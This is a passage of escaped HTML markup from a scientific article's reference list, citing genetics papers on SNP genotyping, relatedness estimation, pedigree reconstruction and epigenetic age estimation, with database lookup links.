id=\u0022ref-30\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.30\u0022 data-doi=\u002210.1016\/j.tree.2004.01.009\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EMorin\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EP. A.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ELuikart\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EG.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWayne\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ER. K.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E and the SNP workshop group, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2004\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ESNPs in ecology, evolution and conservation.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003ETrends Ecol. Evol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E19\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E208\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E216\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DTrends%2BEcol.%2BEvol.%26rft.volume%253D19%26rft.spage%253D208%26rft_id%253Dinfo%253Adoi%252F10.1016%252Fj.tree.2004.01.009%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1016\/j.tree.2004.01.009\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000220842400008\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-31-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-31\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.31\u0022 data-doi=\u002210.1038\/nrg2986\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ENielsen\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ER.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPaul\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. S.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAlbrechtsen\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESong\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EY. S.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2011\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EGenotype and SNP calling from next-generation sequencing data.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003ENat. Rev. Genet.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E12\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E443\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E451\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DNature%2Breviews.%2BGenetics%26rft.stitle%253DNat%2BRev%2BGenet%26rft.aulast%253DNielsen%26rft.auinit1%253DR.%26rft.volume%253D12%26rft.issue%253D6%26rft.spage%253D443%26rft.epage%253D451%26rft.atitle%253DGenotype%2Band%2BSNP%2Bcalling%2Bfrom%2Bnext-generation%2Bsequencing%2Bdata.%26rft_id%253Dinfo%253Adoi%252F10.1038%252Fnrg2986%26rft_id%253Dinfo%253Apmid%252F21587300%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1038\/nrg2986\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=21587300\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-32-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-32\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.32\u0022 data-doi=\u002210.1111\/j.1755-0998.2010.02887.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPalsb\u00f8ll\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EP. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPeery\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM. Z.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EB\u00e9rub\u00e9\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2010\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EDetecting populations in the \u2018ambiguous\u2019 zone: kinship-based estimation of population structure at low genetic divergence.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol. Resour.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E10\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E797\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E805\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%2BResour.%26rft.volume%253D10%26rft.spage%253D797%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fj.1755-0998.2010.02887.x%26rft_id%253Dinfo%253Apmid%252F21565091%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/j.1755-0998.2010.02887.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=21565091\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-33-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-33\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.33\u0022 data-doi=\u002210.1371\/journal.pone.0037135\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPeterson\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EB.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWeber\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKay\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EE.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EFisher\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EH.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHoekstra\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EH.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2012\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EDouble digest RADseq: an inexpensive method for de novo SNP discovery and genotyping in model and non-model species.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EPLoS One\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E7\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003Ee37135\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.stitle%253DPLoS%2BONE%26rft.aulast%253DPeterson%26rft.auinit1%253DB.%2BK.%26rft.volume%253D7%26rft.issue%253D5%26rft.spage%253De37135%26rft.epage%253De37135%26rft.atitle%253DDouble%2Bdigest%2BRADseq%253A%2Ban%2Binexpensive%2Bmethod%2Bfor%2Bde%2Bnovo%2BSNP%2Bdiscovery%2Band%2Bgenotyping%2Bin%2Bmodel%2Band%2Bnon-model%2Bspecies.%26rft_id%253Dinfo%253Adoi%252F10.1371%252Fjournal.pone.0037135%26rft_id%253Dinfo%253Apmid%252F22675423%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1371\/journal.pone.0037135\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=22675423\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-34-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-34\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.34\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPolanowski\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ERobbins\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EChandler\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EJarman\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES. N.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EEpigenetic estimation of age in humpback whales.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol. Resour.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E14\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E976\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E987\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%2BResour.%26rft.volume%253D14%26rft.spage%253D976%26rft_id%253Dinfo%253Apmid%252F24606053%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=24606053\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-35-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-35\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.35\u0022 data-doi=\u002210.2307\/2409206\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EQueller\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED. C.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EGoodnight\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EK. F.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E1989\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EEstimating relatedness using genetic-markers.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EEvolution\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E43\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E258\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E275\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DEvolution%26rft.volume%253D43%26rft.spage%253D258%26rft_id%253Dinfo%253Adoi%252F10.2307%252F2409206%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.2307\/2409206\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=A1989T799700002\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-36-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-36\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.36\u0022 data-doi=\u002210.1093\/bioinformatics\/btp064\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ERiester\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EStadler\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EP. F.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKlemm\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EK.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2009\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EFRANz: reconstruction of wild multi-generation pedigrees.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EBioinformatics\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E25\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E2134\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E2139\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DBioinformatics%26rft_id%253Dinfo%253Adoi%252F10.1093%252Fbioinformatics%252Fbtp064%26rft_id%253Dinfo%253Apmid%252F19202194%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6NzoiYmlvaW5mbyI7czo1OiJyZXNpZCI7czoxMDoiMjUvMTYvMjEzNCI7czo0OiJhdG9tIjtzOjE4OiIvZ2dnLzUvOS8xODE1LmF0b20iO31zOjg6ImZyYWdtZW50IjtzOjA6IiI7fQ==\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-37-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-37\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.37\u0022 data-doi=\u002210.1002\/elps.200500671\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESanchez\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPhillips\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EC.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EB\u00f8rsting\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EC.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBalogh\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EK.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBogus\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2006\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EA multiplex assay with 52 single nucleotide polymorphisms for human identification.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EElectrophoresis\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E27\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1713\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1724\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DElectrophoresis%26rft.stitle%253DElectrophoresis%26rft.aulast%253DSanchez%26rft.auinit1%253DJ.%2BJ.%26rft.volume%253D27%26rft.issue%253D9%26rft.spage%253D1713%26rft.epage%253D1724%26rft.atitle%253DA%2Bmultiplex%2Bassay%2Bwith%2B52%2Bsingle%2Bnucleotide%2Bpolymorphisms%2Bfor%2Bhuman%2Bidentification.%26rft_id%253Dinfo%253Adoi%252F10.1002%252Felps.200500671%26rft_id%253Dinfo%253Apmid%252F16586411%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 